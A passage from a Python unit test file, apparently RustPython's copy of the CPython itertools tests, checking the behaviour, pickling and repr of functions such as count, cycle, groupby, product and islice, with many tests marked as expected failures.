comb = list(combinations(s, r))
# Check size
self.assertEqual(len(prod), n**r)
self.assertEqual(len(cwr), (fact(n+r-1) / fact(r)/ fact(n-1)) if n else (not r))
self.assertEqual(len(perm), 0 if r>n else fact(n) / fact(n-r))
self.assertEqual(len(comb), 0 if r>n else fact(n) / fact(r) / fact(n-r))
# Check lexicographic order without repeated tuples
self.assertEqual(prod, sorted(set(prod)))
self.assertEqual(cwr, sorted(set(cwr)))
self.assertEqual(perm, sorted(set(perm)))
self.assertEqual(comb, sorted(set(comb)))
# Check interrelationships
self.assertEqual(cwr, [t for t in prod if sorted(t)==list(t)]) # cwr: prods which are sorted
self.assertEqual(perm, [t for t in prod if len(set(t))==r]) # perm: prods with no dups
self.assertEqual(comb, [t for t in perm if sorted(t)==list(t)]) # comb: perms that are sorted
self.assertEqual(comb, [t for t in cwr if len(set(t))==r]) # comb: cwrs without dups
self.assertEqual(comb, list(filter(set(cwr).__contains__, perm))) # comb: perm that is a cwr
self.assertEqual(comb, list(filter(set(perm).__contains__, cwr))) # comb: cwr that is a perm
self.assertEqual(comb, sorted(set(cwr) & set(perm))) # comb: both a cwr and a perm
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_compress(self):
self.assertEqual(list(compress(data='ABCDEF', selectors=[1,0,1,0,1,1])), list('ACEF'))
self.assertEqual(list(compress('ABCDEF', [1,0,1,0,1,1])), list('ACEF'))
self.assertEqual(list(compress('ABCDEF', [0,0,0,0,0,0])), list(''))
self.assertEqual(list(compress('ABCDEF', [1,1,1,1,1,1])), list('ABCDEF'))
self.assertEqual(list(compress('ABCDEF', [1,0,1])), list('AC'))
self.assertEqual(list(compress('ABC', [0,1,1,1,1,1])), list('BC'))
n = 10000
data = chain.from_iterable(repeat(range(6), n))
selectors = chain.from_iterable(repeat((0, 1)))
self.assertEqual(list(compress(data, selectors)), [1,3,5] * n)
self.assertRaises(TypeError, compress, None, range(6)) # 1st arg not iterable
self.assertRaises(TypeError, compress, range(6), None) # 2nd arg not iterable
self.assertRaises(TypeError, compress, range(6)) # too few args
self.assertRaises(TypeError, compress, range(6), None) # too many args
# check copy, deepcopy, pickle
for op in [lambda a:copy.copy(a), lambda a:copy.deepcopy(a)] + picklecopiers:
for data, selectors, result1, result2 in [
('ABCDEF', [1,0,1,0,1,1], 'ACEF', 'CEF'),
('ABCDEF', [0,0,0,0,0,0], '', ''),
('ABCDEF', [1,1,1,1,1,1], 'ABCDEF', 'BCDEF'),
('ABCDEF', [1,0,1], 'AC', 'C'),
('ABC', [0,1,1,1,1,1], 'BC', 'C'),
]:
self.assertEqual(list(op(compress(data=data, selectors=selectors))), list(result1))
self.assertEqual(list(op(compress(data, selectors))), list(result1))
testIntermediate = compress(data, selectors)
if result1:
next(testIntermediate)
self.assertEqual(list(op(testIntermediate)), list(result2))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_count(self):
self.assertEqual(lzip('abc',count()), [('a', 0), ('b', 1), ('c', 2)])
self.assertEqual(lzip('abc',count(3)), [('a', 3), ('b', 4), ('c', 5)])
self.assertEqual(take(2, lzip('abc',count(3))), [('a', 3), ('b', 4)])
self.assertEqual(take(2, zip('abc',count(-1))), [('a', -1), ('b', 0)])
self.assertEqual(take(2, zip('abc',count(-3))), [('a', -3), ('b', -2)])
self.assertRaises(TypeError, count, 2, 3, 4)
self.assertRaises(TypeError, count, 'a')
self.assertEqual(take(10, count(maxsize-5)),
list(range(maxsize-5, maxsize+5)))
self.assertEqual(take(10, count(-maxsize-5)),
list(range(-maxsize-5, -maxsize+5)))
self.assertEqual(take(3, count(3.25)), [3.25, 4.25, 5.25])
self.assertEqual(take(3, count(3.25-4j)), [3.25-4j, 4.25-4j, 5.25-4j])
self.assertEqual(take(3, count(Decimal('1.1'))),
[Decimal('1.1'), Decimal('2.1'), Decimal('3.1')])
self.assertEqual(take(3, count(Fraction(2, 3))),
[Fraction(2, 3), Fraction(5, 3), Fraction(8, 3)])
BIGINT = 1<<1000
self.assertEqual(take(3, count(BIGINT)), [BIGINT, BIGINT+1, BIGINT+2])
c = count(3)
self.assertEqual(repr(c), 'count(3)')
next(c)
self.assertEqual(repr(c), 'count(4)')
c = count(-9)
self.assertEqual(repr(c), 'count(-9)')
next(c)
self.assertEqual(next(c), -8)
self.assertEqual(repr(count(10.25)), 'count(10.25)')
self.assertEqual(repr(count(10.0)), 'count(10.0)')
self.assertEqual(type(next(count(10.0))), float)
for i in (-sys.maxsize-5, -sys.maxsize+5 ,-10, -1, 0, 10, sys.maxsize-5, sys.maxsize+5):
# Test repr
r1 = repr(count(i))
r2 = 'count(%r)'.__mod__(i)
self.assertEqual(r1, r2)
# check copy, deepcopy, pickle
for value in -3, 3, maxsize-5, maxsize+5:
c = count(value)
self.assertEqual(next(copy.copy(c)), value)
self.assertEqual(next(copy.deepcopy(c)), value)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, count(value))
#check proper internal error handling for large "step' sizes
count(1, maxsize+5); sys.exc_info()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_count_with_stride(self):
self.assertEqual(lzip('abc',count(2,3)), [('a', 2), ('b', 5), ('c', 8)])
self.assertEqual(lzip('abc',count(start=2,step=3)),
[('a', 2), ('b', 5), ('c', 8)])
self.assertEqual(lzip('abc',count(step=-1)),
[('a', 0), ('b', -1), ('c', -2)])
self.assertRaises(TypeError, count, 'a', 'b')
self.assertEqual(lzip('abc',count(2,0)), [('a', 2), ('b', 2), ('c', 2)])
self.assertEqual(lzip('abc',count(2,1)), [('a', 2), ('b', 3), ('c', 4)])
self.assertEqual(lzip('abc',count(2,3)), [('a', 2), ('b', 5), ('c', 8)])
self.assertEqual(take(20, count(maxsize-15, 3)), take(20, range(maxsize-15, maxsize+100, 3)))
self.assertEqual(take(20, count(-maxsize-15, 3)), take(20, range(-maxsize-15,-maxsize+100, 3)))
self.assertEqual(take(3, count(10, maxsize+5)),
list(range(10, 10+3*(maxsize+5), maxsize+5)))
self.assertEqual(take(3, count(2, 1.25)), [2, 3.25, 4.5])
self.assertEqual(take(3, count(2, 3.25-4j)), [2, 5.25-4j, 8.5-8j])
self.assertEqual(take(3, count(Decimal('1.1'), Decimal('.1'))),
[Decimal('1.1'), Decimal('1.2'), Decimal('1.3')])
self.assertEqual(take(3, count(Fraction(2,3), Fraction(1,7))),
[Fraction(2,3), Fraction(17,21), Fraction(20,21)])
BIGINT = 1<<1000
self.assertEqual(take(3, count(step=BIGINT)), [0, BIGINT, 2*BIGINT])
self.assertEqual(repr(take(3, count(10, 2.5))), repr([10, 12.5, 15.0]))
c = count(3, 5)
self.assertEqual(repr(c), 'count(3, 5)')
next(c)
self.assertEqual(repr(c), 'count(8, 5)')
c = count(-9, 0)
self.assertEqual(repr(c), 'count(-9, 0)')
next(c)
self.assertEqual(repr(c), 'count(-9, 0)')
c = count(-9, -3)
self.assertEqual(repr(c), 'count(-9, -3)')
next(c)
self.assertEqual(repr(c), 'count(-12, -3)')
self.assertEqual(repr(c), 'count(-12, -3)')
self.assertEqual(repr(count(10.5, 1.25)), 'count(10.5, 1.25)')
self.assertEqual(repr(count(10.5, 1)), 'count(10.5)') # suppress step=1 when it's an int
self.assertEqual(repr(count(10.5, 1.00)), 'count(10.5, 1.0)') # do show float values lilke 1.0
self.assertEqual(repr(count(10, 1.00)), 'count(10, 1.0)')
c = count(10, 1.0)
self.assertEqual(type(next(c)), int)
self.assertEqual(type(next(c)), float)
for i in (-sys.maxsize-5, -sys.maxsize+5 ,-10, -1, 0, 10, sys.maxsize-5, sys.maxsize+5):
for j in (-sys.maxsize-5, -sys.maxsize+5 ,-10, -1, 0, 1, 10, sys.maxsize-5, sys.maxsize+5):
# Test repr
r1 = repr(count(i, j))
if j == 1:
r2 = ('count(%r)' % i)
else:
r2 = ('count(%r, %r)' % (i, j))
self.assertEqual(r1, r2)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, count(i, j))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_cycle(self):
self.assertEqual(take(10, cycle('abc')), list('abcabcabca'))
self.assertEqual(list(cycle('')), [])
self.assertRaises(TypeError, cycle)
self.assertRaises(TypeError, cycle, 5)
self.assertEqual(list(islice(cycle(gen3()),10)), [0,1,2,0,1,2,0,1,2,0])
# check copy, deepcopy, pickle
c = cycle('abc')
self.assertEqual(next(c), 'a')
#simple copy currently not supported, because __reduce__ returns
#an internal iterator
#self.assertEqual(take(10, copy.copy(c)), list('bcabcabcab'))
self.assertEqual(take(10, copy.deepcopy(c)), list('bcabcabcab'))
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertEqual(take(10, pickle.loads(pickle.dumps(c, proto))),
list('bcabcabcab'))
next(c)
self.assertEqual(take(10, pickle.loads(pickle.dumps(c, proto))),
list('cabcabcabc'))
next(c)
next(c)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, cycle('abc'))
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
# test with partial consumed input iterable
it = iter('abcde')
c = cycle(it)
_ = [next(c) for i in range(2)] # consume 2 of 5 inputs
p = pickle.dumps(c, proto)
d = pickle.loads(p) # rebuild the cycle object
self.assertEqual(take(20, d), list('cdeabcdeabcdeabcdeab'))
# test with completely consumed input iterable
it = iter('abcde')
c = cycle(it)
_ = [next(c) for i in range(7)] # consume 7 of 5 inputs
p = pickle.dumps(c, proto)
d = pickle.loads(p) # rebuild the cycle object
self.assertEqual(take(20, d), list('cdeabcdeabcdeabcdeab'))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_cycle_setstate(self):
# Verify both modes for restoring state
# Mode 0 is efficient. It uses an incompletely consumed input
# iterator to build a cycle object and then passes in state with
# a list of previously consumed values. There is no data
# overlap between the two.
c = cycle('defg')
c.__setstate__((list('abc'), 0))
self.assertEqual(take(20, c), list('defgabcdefgabcdefgab'))
# Mode 1 is inefficient. It starts with a cycle object built
# from an iterator over the remaining elements in a partial
# cycle and then passes in state with all of the previously
# seen values (this overlaps values included in the iterator).
c = cycle('defg')
c.__setstate__((list('abcdefg'), 1))
self.assertEqual(take(20, c), list('defgabcdefgabcdefgab'))
# The first argument to setstate needs to be a tuple
with self.assertRaises(TypeError):
cycle('defg').__setstate__([list('abcdefg'), 0])
# The first argument in the setstate tuple must be a list
with self.assertRaises(TypeError):
c = cycle('defg')
c.__setstate__((tuple('defg'), 0))
take(20, c)
# The second argument in the setstate tuple must be an int
with self.assertRaises(TypeError):
cycle('defg').__setstate__((list('abcdefg'), 'x'))
self.assertRaises(TypeError, cycle('').__setstate__, ())
self.assertRaises(TypeError, cycle('').__setstate__, ([],))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_groupby(self):
# Check whether it accepts arguments correctly
self.assertEqual([], list(groupby([])))
self.assertEqual([], list(groupby([], key=id)))
self.assertRaises(TypeError, list, groupby('abc', []))
self.assertRaises(TypeError, groupby, None)
self.assertRaises(TypeError, groupby, 'abc', lambda x:x, 10)
# Check normal input
s = [(0, 10, 20), (0, 11,21), (0,12,21), (1,13,21), (1,14,22),
(2,15,22), (3,16,23), (3,17,23)]
dup = []
for k, g in groupby(s, lambda r:r[0]):
for elem in g:
self.assertEqual(k, elem[0])
dup.append(elem)
self.assertEqual(s, dup)
# Check normal pickled
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
dup = []
for k, g in pickle.loads(pickle.dumps(groupby(s, testR), proto)):
for elem in g:
self.assertEqual(k, elem[0])
dup.append(elem)
self.assertEqual(s, dup)
# Check nested case
dup = []
for k, g in groupby(s, testR):
for ik, ig in groupby(g, testR2):
for elem in ig:
self.assertEqual(k, elem[0])
self.assertEqual(ik, elem[2])
dup.append(elem)
self.assertEqual(s, dup)
# Check nested and pickled
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
dup = []
for k, g in pickle.loads(pickle.dumps(groupby(s, testR), proto)):
for ik, ig in pickle.loads(pickle.dumps(groupby(g, testR2), proto)):
for elem in ig:
self.assertEqual(k, elem[0])
self.assertEqual(ik, elem[2])
dup.append(elem)
self.assertEqual(s, dup)
# Check case where inner iterator is not used
keys = [k for k, g in groupby(s, testR)]
expectedkeys = set([r[0] for r in s])
self.assertEqual(set(keys), expectedkeys)
self.assertEqual(len(keys), len(expectedkeys))
# Check case where inner iterator is used after advancing the groupby
# iterator
s = list(zip('AABBBAAAA', range(9)))
it = groupby(s, testR)
_, g1 = next(it)
_, g2 = next(it)
_, g3 = next(it)
self.assertEqual(list(g1), [])
self.assertEqual(list(g2), [])
self.assertEqual(next(g3), ('A', 5))
list(it) # exhaust the groupby iterator
self.assertEqual(list(g3), [])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
it = groupby(s, testR)
_, g = next(it)
next(it)
next(it)
self.assertEqual(list(pickle.loads(pickle.dumps(g, proto))), [])
# Exercise pipes and filters style
s = 'abracadabra'
# sort s | uniq
r = [k for k, g in groupby(sorted(s))]
self.assertEqual(r, ['a', 'b', 'c', 'd', 'r'])
# sort s | uniq -d
r = [k for k, g in groupby(sorted(s)) if list(islice(g,1,2))]
self.assertEqual(r, ['a', 'b', 'r'])
# sort s | uniq -c
r = [(len(list(g)), k) for k, g in groupby(sorted(s))]
self.assertEqual(r, [(5, 'a'), (2, 'b'), (1, 'c'), (1, 'd'), (2, 'r')])
# sort s | uniq -c | sort -rn | head -3
r = sorted([(len(list(g)) , k) for k, g in groupby(sorted(s))], reverse=True)[:3]
self.assertEqual(r, [(5, 'a'), (2, 'r'), (2, 'b')])
# iter.__next__ failure
class ExpectedError(Exception):
pass
def delayed_raise(n=0):
for i in range(n):
yield 'yo'
raise ExpectedError
def gulp(iterable, keyp=None, func=list):
return [func(g) for k, g in groupby(iterable, keyp)]
# iter.__next__ failure on outer object
self.assertRaises(ExpectedError, gulp, delayed_raise(0))
# iter.__next__ failure on inner object
self.assertRaises(ExpectedError, gulp, delayed_raise(1))
# __eq__ failure
class DummyCmp:
def __eq__(self, dst):
raise ExpectedError
s = [DummyCmp(), DummyCmp(), None]
# __eq__ failure on outer object
self.assertRaises(ExpectedError, gulp, s, func=id)
# __eq__ failure on inner object
self.assertRaises(ExpectedError, gulp, s)
# keyfunc failure
def keyfunc(obj):
if keyfunc.skip > 0:
keyfunc.skip -= 1
return obj
else:
raise ExpectedError
# keyfunc failure on outer object
keyfunc.skip = 0
self.assertRaises(ExpectedError, gulp, [None], keyfunc)
keyfunc.skip = 1
self.assertRaises(ExpectedError, gulp, [None, None], keyfunc)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_filter(self):
self.assertEqual(list(filter(isEven, range(6))), [0,2,4])
self.assertEqual(list(filter(None, [0,1,0,2,0])), [1,2])
self.assertEqual(list(filter(bool, [0,1,0,2,0])), [1,2])
self.assertEqual(take(4, filter(isEven, count())), [0,2,4,6])
self.assertRaises(TypeError, filter)
self.assertRaises(TypeError, filter, lambda x:x)
self.assertRaises(TypeError, filter, lambda x:x, range(6), 7)
self.assertRaises(TypeError, filter, isEven, 3)
self.assertRaises(TypeError, next, filter(range(6), range(6)))
# check copy, deepcopy, pickle
ans = [0,2,4]
c = filter(isEven, range(6))
self.assertEqual(list(copy.copy(c)), ans)
c = filter(isEven, range(6))
self.assertEqual(list(copy.deepcopy(c)), ans)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
c = filter(isEven, range(6))
self.assertEqual(list(pickle.loads(pickle.dumps(c, proto))), ans)
next(c)
self.assertEqual(list(pickle.loads(pickle.dumps(c, proto))), ans[1:])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
c = filter(isEven, range(6))
self.pickletest(proto, c)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_filterfalse(self):
self.assertEqual(list(filterfalse(isEven, range(6))), [1,3,5])
self.assertEqual(list(filterfalse(None, [0,1,0,2,0])), [0,0,0])
self.assertEqual(list(filterfalse(bool, [0,1,0,2,0])), [0,0,0])
self.assertEqual(take(4, filterfalse(isEven, count())), [1,3,5,7])
self.assertRaises(TypeError, filterfalse)
self.assertRaises(TypeError, filterfalse, lambda x:x)
self.assertRaises(TypeError, filterfalse, lambda x:x, range(6), 7)
self.assertRaises(TypeError, filterfalse, isEven, 3)
self.assertRaises(TypeError, next, filterfalse(range(6), range(6)))
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, filterfalse(isEven, range(6)))
def test_zip(self):
# XXX This is rather silly now that builtin zip() calls zip()...
ans = [(x,y) for x, y in zip('abc',count())]
self.assertEqual(ans, [('a', 0), ('b', 1), ('c', 2)])
self.assertEqual(list(zip('abc', range(6))), lzip('abc', range(6)))
self.assertEqual(list(zip('abcdef', range(3))), lzip('abcdef', range(3)))
self.assertEqual(take(3,zip('abcdef', count())), lzip('abcdef', range(3)))
self.assertEqual(list(zip('abcdef')), lzip('abcdef'))
self.assertEqual(list(zip()), lzip())
self.assertRaises(TypeError, zip, 3)
self.assertRaises(TypeError, zip, range(3), 3)
self.assertEqual([tuple(list(pair)) for pair in zip('abc', 'def')],
lzip('abc', 'def'))
self.assertEqual([pair for pair in zip('abc', 'def')],
lzip('abc', 'def'))
@support.impl_detail("tuple reuse is specific to CPython")
def test_zip_tuple_reuse(self):
ids = list(map(id, zip('abc', 'def')))
self.assertEqual(min(ids), max(ids))
ids = list(map(id, list(zip('abc', 'def'))))
self.assertEqual(len(dict.fromkeys(ids)), len(ids))
# check copy, deepcopy, pickle
ans = [(x,y) for x, y in copy.copy(zip('abc',count()))]
self.assertEqual(ans, [('a', 0), ('b', 1), ('c', 2)])
ans = [(x,y) for x, y in copy.deepcopy(zip('abc',count()))]
self.assertEqual(ans, [('a', 0), ('b', 1), ('c', 2)])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
ans = [(x,y) for x, y in pickle.loads(pickle.dumps(zip('abc',count()), proto))]
self.assertEqual(ans, [('a', 0), ('b', 1), ('c', 2)])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
testIntermediate = zip('abc',count())
next(testIntermediate)
ans = [(x,y) for x, y in pickle.loads(pickle.dumps(testIntermediate, proto))]
self.assertEqual(ans, [('b', 1), ('c', 2)])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, zip('abc', count()))
def test_ziplongest(self):
for args in [
['abc', range(6)],
[range(6), 'abc'],
[range(1000), range(2000,2100), range(3000,3050)],
[range(1000), range(0), range(3000,3050), range(1200), range(1500)],
[range(1000), range(0), range(3000,3050), range(1200), range(1500), range(0)],
]:
target = [tuple([arg[i] if i < len(arg) else None for arg in args])
for i in range(max(map(len, args)))]
self.assertEqual(list(zip_longest(*args)), target)
self.assertEqual(list(zip_longest(*args, **{})), target)
target = [tuple((e is None and 'X' or e) for e in t) for t in target] # Replace None fills with 'X'
self.assertEqual(list(zip_longest(*args, **dict(fillvalue='X'))), target)
self.assertEqual(take(3,zip_longest('abcdef', count())), list(zip('abcdef', range(3)))) # take 3 from infinite input
self.assertEqual(list(zip_longest()), list(zip()))
self.assertEqual(list(zip_longest([])), list(zip([])))
self.assertEqual(list(zip_longest('abcdef')), list(zip('abcdef')))
self.assertEqual(list(zip_longest('abc', 'defg', **{})),
list(zip(list('abc')+[None], 'defg'))) # empty keyword dict
self.assertRaises(TypeError, zip_longest, 3)
self.assertRaises(TypeError, zip_longest, range(3), 3)
for stmt in [
"zip_longest('abc', fv=1)",
"zip_longest('abc', fillvalue=1, bogus_keyword=None)",
]:
try:
eval(stmt, globals(), locals())
except TypeError:
pass
else:
self.fail('Did not raise Type in: ' + stmt)
self.assertEqual([tuple(list(pair)) for pair in zip_longest('abc', 'def')],
list(zip('abc', 'def')))
self.assertEqual([pair for pair in zip_longest('abc', 'def')],
list(zip('abc', 'def')))
@support.impl_detail("tuple reuse is specific to CPython")
def test_zip_longest_tuple_reuse(self):
ids = list(map(id, zip_longest('abc', 'def')))
self.assertEqual(min(ids), max(ids))
ids = list(map(id, list(zip_longest('abc', 'def'))))
self.assertEqual(len(dict.fromkeys(ids)), len(ids))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_zip_longest_pickling(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, zip_longest("abc", "def"))
self.pickletest(proto, zip_longest("abc", "defgh"))
self.pickletest(proto, zip_longest("abc", "defgh", fillvalue=1))
self.pickletest(proto, zip_longest("", "defgh"))
def test_zip_longest_bad_iterable(self):
exception = TypeError()
class BadIterable:
def __iter__(self):
raise exception
with self.assertRaises(TypeError) as cm:
zip_longest(BadIterable())
self.assertIs(cm.exception, exception)
def test_bug_7244(self):
class Repeater:
# this class is similar to itertools.repeat
def __init__(self, o, t, e):
self.o = o
self.t = int(t)
self.e = e
def __iter__(self): # its iterator is itself
return self
def __next__(self):
if self.t > 0:
self.t -= 1
return self.o
else:
raise self.e
# Formerly this code in would fail in debug mode
# with Undetected Error and Stop Iteration
r1 = Repeater(1, 3, StopIteration)
r2 = Repeater(2, 4, StopIteration)
def run(r1, r2):
result = []
for i, j in zip_longest(r1, r2, fillvalue=0):
with support.captured_output('stdout'):
print((i, j))
result.append((i, j))
return result
self.assertEqual(run(r1, r2), [(1,2), (1,2), (1,2), (0,2)])
# Formerly, the RuntimeError would be lost
# and StopIteration would stop as expected
r1 = Repeater(1, 3, RuntimeError)
r2 = Repeater(2, 4, StopIteration)
it = zip_longest(r1, r2, fillvalue=0)
self.assertEqual(next(it), (1, 2))
self.assertEqual(next(it), (1, 2))
self.assertEqual(next(it), (1, 2))
self.assertRaises(RuntimeError, next, it)
def test_product(self):
for args, result in [
([], [()]), # zero iterables
(['ab'], [('a',), ('b',)]), # one iterable
([range(2), range(3)], [(0,0), (0,1), (0,2), (1,0), (1,1), (1,2)]), # two iterables
([range(0), range(2), range(3)], []), # first iterable with zero length
([range(2), range(0), range(3)], []), # middle iterable with zero length
([range(2), range(3), range(0)], []), # last iterable with zero length
]:
self.assertEqual(list(product(*args)), result)
for r in range(4):
self.assertEqual(list(product(*(args*r))),
list(product(*args, **dict(repeat=r))))
self.assertEqual(len(list(product(*[range(7)]*6))), 7**6)
self.assertRaises(TypeError, product, range(6), None)
def product1(*args, **kwds):
pools = list(map(tuple, args)) * kwds.get('repeat', 1)
n = len(pools)
if n == 0:
yield ()
return
if any(len(pool) == 0 for pool in pools):
return
indices = [0] * n
yield tuple(pool[i] for pool, i in zip(pools, indices))
while 1:
for i in reversed(range(n)): # right to left
if indices[i] == len(pools[i]) - 1:
continue
indices[i] += 1
for j in range(i+1, n):
indices[j] = 0
yield tuple(pool[i] for pool, i in zip(pools, indices))
break
else:
return
def product2(*args, **kwds):
'Pure python version used in docs'
pools = list(map(tuple, args)) * kwds.get('repeat', 1)
result = [[]]
for pool in pools:
result = [x+[y] for x in result for y in pool]
for prod in result:
yield tuple(prod)
argtypes = ['', 'abc', '', range(0), range(4), dict(a=1, b=2, c=3),
set('abcdefg'), range(11), tuple(range(13))]
for i in range(100):
args = [random.choice(argtypes) for j in range(random.randrange(5))]
expected_len = prod(map(len, args))
self.assertEqual(len(list(product(*args))), expected_len)
self.assertEqual(list(product(*args)), list(product1(*args)))
self.assertEqual(list(product(*args)), list(product2(*args)))
args = map(iter, args)
self.assertEqual(len(list(product(*args))), expected_len)
@support.bigaddrspacetest
def test_product_overflow(self):
with self.assertRaises((OverflowError, MemoryError)):
product(*(['ab']*2**5), repeat=2**25)
@support.impl_detail("tuple reuse is specific to CPython")
def test_product_tuple_reuse(self):
self.assertEqual(len(set(map(id, product('abc', 'def')))), 1)
self.assertNotEqual(len(set(map(id, list(product('abc', 'def'))))), 1)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_product_pickling(self):
# check copy, deepcopy, pickle
for args, result in [
([], [()]), # zero iterables
(['ab'], [('a',), ('b',)]), # one iterable
([range(2), range(3)], [(0,0), (0,1), (0,2), (1,0), (1,1), (1,2)]), # two iterables
([range(0), range(2), range(3)], []), # first iterable with zero length
([range(2), range(0), range(3)], []), # middle iterable with zero length
([range(2), range(3), range(0)], []), # last iterable with zero length
]:
self.assertEqual(list(copy.copy(product(*args))), result)
self.assertEqual(list(copy.deepcopy(product(*args))), result)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, product(*args))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_product_issue_25021(self):
# test that indices are properly clamped to the length of the tuples
p = product((1, 2),(3,))
p.__setstate__((0, 0x1000)) # will access tuple element 1 if not clamped
self.assertEqual(next(p), (2, 3))
# test that empty tuple in the list will result in an immediate StopIteration
p = product((1, 2), (), (3,))
p.__setstate__((0, 0, 0x1000)) # will access tuple element 1 if not clamped
self.assertRaises(StopIteration, next, p)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_repeat(self):
self.assertEqual(list(repeat(object='a', times=3)), ['a', 'a', 'a'])
self.assertEqual(lzip(range(3),repeat('a')),
[(0, 'a'), (1, 'a'), (2, 'a')])
self.assertEqual(list(repeat('a', 3)), ['a', 'a', 'a'])
self.assertEqual(take(3, repeat('a')), ['a', 'a', 'a'])
self.assertEqual(list(repeat('a', 0)), [])
self.assertEqual(list(repeat('a', -3)), [])
self.assertRaises(TypeError, repeat)
self.assertRaises(TypeError, repeat, None, 3, 4)
self.assertRaises(TypeError, repeat, None, 'a')
r = repeat(1+0j)
self.assertEqual(repr(r), 'repeat((1+0j))')
r = repeat(1+0j, 5)
self.assertEqual(repr(r), 'repeat((1+0j), 5)')
list(r)
self.assertEqual(repr(r), 'repeat((1+0j), 0)')
# check copy, deepcopy, pickle
c = repeat(object='a', times=10)
self.assertEqual(next(c), 'a')
self.assertEqual(take(2, copy.copy(c)), list('a' * 2))
self.assertEqual(take(2, copy.deepcopy(c)), list('a' * 2))
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, repeat(object='a', times=10))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_repeat_with_negative_times(self):
self.assertEqual(repr(repeat('a', -1)), "repeat('a', 0)")
self.assertEqual(repr(repeat('a', -2)), "repeat('a', 0)")
self.assertEqual(repr(repeat('a', times=-1)), "repeat('a', 0)")
self.assertEqual(repr(repeat('a', times=-2)), "repeat('a', 0)")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_map(self):
self.assertEqual(list(map(operator.pow, range(3), range(1,7))),
[0**1, 1**2, 2**3])
self.assertEqual(list(map(tupleize, 'abc', range(5))),
[('a',0),('b',1),('c',2)])
self.assertEqual(list(map(tupleize, 'abc', count())),
[('a',0),('b',1),('c',2)])
self.assertEqual(take(2,map(tupleize, 'abc', count())),
[('a',0),('b',1)])
self.assertEqual(list(map(operator.pow, [])), [])
self.assertRaises(TypeError, map)
self.assertRaises(TypeError, list, map(None, range(3), range(3)))
self.assertRaises(TypeError, map, operator.neg)
self.assertRaises(TypeError, next, map(10, range(5)))
self.assertRaises(ValueError, next, map(errfunc, [4], [5]))
self.assertRaises(TypeError, next, map(onearg, [4], [5]))
# check copy, deepcopy, pickle
ans = [('a',0),('b',1),('c',2)]
c = map(tupleize, 'abc', count())
self.assertEqual(list(copy.copy(c)), ans)
c = map(tupleize, 'abc', count())
self.assertEqual(list(copy.deepcopy(c)), ans)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
c = map(tupleize, 'abc', count())
self.pickletest(proto, c)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_starmap(self):
self.assertEqual(list(starmap(operator.pow, zip(range(3), range(1,7)))),
[0**1, 1**2, 2**3])
self.assertEqual(take(3, starmap(operator.pow, zip(count(), count(1)))),
[0**1, 1**2, 2**3])
self.assertEqual(list(starmap(operator.pow, [])), [])
self.assertEqual(list(starmap(operator.pow, [iter([4,5])])), [4**5])
self.assertRaises(TypeError, list, starmap(operator.pow, [None]))
self.assertRaises(TypeError, starmap)
self.assertRaises(TypeError, starmap, operator.pow, [(4,5)], 'extra')
self.assertRaises(TypeError, next, starmap(10, [(4,5)]))
self.assertRaises(ValueError, next, starmap(errfunc, [(4,5)]))
self.assertRaises(TypeError, next, starmap(onearg, [(4,5)]))
# check copy, deepcopy, pickle
ans = [0**1, 1**2, 2**3]
c = starmap(operator.pow, zip(range(3), range(1,7)))
self.assertEqual(list(copy.copy(c)), ans)
c = starmap(operator.pow, zip(range(3), range(1,7)))
self.assertEqual(list(copy.deepcopy(c)), ans)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
c = starmap(operator.pow, zip(range(3), range(1,7)))
self.pickletest(proto, c)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_islice(self):
for args in [ # islice(args) should agree with range(args)
(10, 20, 3),
(10, 3, 20),
(10, 20),
(10, 10),
(10, 3),
(20,)
]:
self.assertEqual(list(islice(range(100), *args)),
list(range(*args)))
for args, tgtargs in [ # Stop when seqn is exhausted
((10, 110, 3), ((10, 100, 3))),
((10, 110), ((10, 100))),
((110,), (100,))
]:
self.assertEqual(list(islice(range(100), *args)),
list(range(*tgtargs)))
# Test stop=None
self.assertEqual(list(islice(range(10), None)), list(range(10)))
self.assertEqual(list(islice(range(10), None, None)), list(range(10)))
self.assertEqual(list(islice(range(10), None, None, None)), list(range(10)))
self.assertEqual(list(islice(range(10), 2, None)), list(range(2, 10)))
self.assertEqual(list(islice(range(10), 1, None, 2)), list(range(1, 10, 2)))
# Test number of items consumed SF #1171417
it = iter(range(10))
self.assertEqual(list(islice(it, 3)), list(range(3)))
self.assertEqual(list(it), list(range(3, 10)))
it = iter(range(10))
self.assertEqual(list(islice(it, 3, 3)), [])
self.assertEqual(list(it), list(range(3, 10)))
# Test invalid arguments
ra = range(10)
self.assertRaises(TypeError, islice, ra)
self.assertRaises(TypeError, islice, ra, 1, 2, 3, 4)
